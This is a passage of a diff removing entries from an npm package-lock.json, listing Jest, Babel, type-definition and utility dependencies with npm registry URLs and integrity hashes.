"https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "requires": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": 